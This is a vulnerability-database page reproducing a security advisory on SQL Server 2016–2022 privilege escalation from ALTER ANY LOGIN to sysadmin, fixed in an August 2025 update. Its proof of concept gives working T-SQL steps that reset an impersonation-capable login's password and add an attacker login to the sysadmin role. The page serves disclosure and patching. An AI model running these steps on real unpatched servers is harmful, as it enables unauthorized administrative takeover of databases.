Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Microsoft SQL Server 2016 / 2017 / 2019 / 2022 Privilege Escalation

🗓️ 18 Aug 2025 00:00:00Reported by Emad Al-MousaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 829 Views

SQL Server privilege escalation ALTER ANY LOGIN and IMPERSONATE ANY LOGIN can elevate to SYSADMIN

Code
Title: MSSQL Database Privilege Elevation From ALTER ANY LOGIN To SYSADMIN
    Product:                   Microsoft SQL Server
    Vendor:                    Microsoft
    Affected Version(s):       SQL Server 2016,2017,2019,2022
    Tested Version(s):         SQL Server 2016,2017,2019,2022
    Fixed Build Versions:      16.0.4210.1 , 16.0.1145.1 , 15.0.4440.1, 15.0.2140.1 , 14.0.3500.1 , 14.0.2080.1, 13.0.7060.1 , 13.0.6465.1  
    Risk Level:                Medium
    Solution Status:           Fixed
    CVE Reference:             N/A
    Author of Advisory:        Emad Al-Mousa
    
    
    *****************************************
    Vulnerability Details:
    
    Privilege escalation/elevation in Microsoft SQL Server database system is possible if a database login is granted the system privilege "ALTER ANY LOGIN", and if any of the existing SQL Server  logins is granted the "IMPERSONATE ANY LOGIN" permission directly....then the account with "ALTER ANY LOGIN" permission will be able to reset/change the password of this account. Consequently, the attacker will be able connect using the account with "IMPERSONATE ANY LOGIN" to elevate his/her primary account to SYSADMIN role.
    
    By Design, SQL Server database login with "ALTER ANY LOGIN" permission can't change the passwords for "sa" built-in account, and can't change the password for logins granted “control server” , “sysadmin” , “securityadmin” as protection mechanism against privilege elevation attacks.
    
    
    *****************************************
    Proof of Concept (PoC):
    
    
    I will create an account called dummy account called “kit” and will grant it ALTER ANY LOGIN permission
    
    
    USE [master]
    GO
    
    CREATE LOGIN [kit] WITH PASSWORD=N'kit123', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
    GO
    
    use [master]
    GO
    GRANT ALTER ANY LOGIN TO [kit]
    GO
    
    
    I will then access the SQL Server Instance using account “kit” , and will search for any login in the database instance that is granted “impersonate any login permission” for the aim to escalate my permissions.
    
    
    Will create two accounts that have “impersonate any login” permissions:
    
    USE [master]
    GO
    CREATE LOGIN [test1] WITH PASSWORD=N'test1', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
    GO
    grant impersonate any login to [test1]
    GO
    
    // control server implicitly has the impersonation permission
    
    USE [master]
    GO
    CREATE LOGIN [test2] WITH PASSWORD=N'test2', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
    GO
    grant control server to [test2]
    GO
    
    
    
    As “kit” login I try to alter/change the password for the two logins test1 & test2:
    
    USE [master]
    GO
    ALTER LOGIN [test1] WITH PASSWORD=N'emad@2025'
    GO
    
    USE [master]
    GO
    ALTER LOGIN [test2] WITH PASSWORD=N'emad@2025'
    GO
    
    So, I was able to change the password only for the login that is explicitly granted “impersonate any login” permission [test1 account], I can’t do that with logins granted “control server” , “sysadmin” , “securityadmin”, or “sa” account as expected and by design.
    
    After, successfully resetting the password for test1 account you can access the SQL Server Instance and escalate “kit” account to sysadmin as shown below:
    
    execute as login='sa'
    alter server role [sysadmin] add member [kit]
    GO
    
    
    Now, let me apply the latest Microsoft security update released in August 2025  KB5063756 and simulate it again: 
    
    USE [master]
    GO
    ALTER LOGIN [test1] WITH PASSWORD=N'hot_summer@2025'
    GO
    
    It will be blocked with the error:
    
    Msg 15151, Level 16, State 1, Line 3
    Cannot alter the login 'test1', because it does not exist or you do not have permission.
    
    
    
    
    *****************************************
    References:
    https://databasesecurityninja.wordpress.com/2025/08/13/sql-server-privilege-elevation-escalation-from-alter-any-login-permission-to-sysadmin-role-fixed-in-august-2025-security-update/
    https://support.microsoft.com/en-us/topic/kb5063756-description-of-the-security-update-for-sql-server-2022-gdr-august-12-2025-f56e3677-84b7-4ba3-ab13-b33fcfabb212

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Aug 2025 00:00Current
8.1High risk
Vulners AI Score8.1
alter any loginimpersonate any loginsystem administrator elevationprivilege escalationfixed vulnerability
829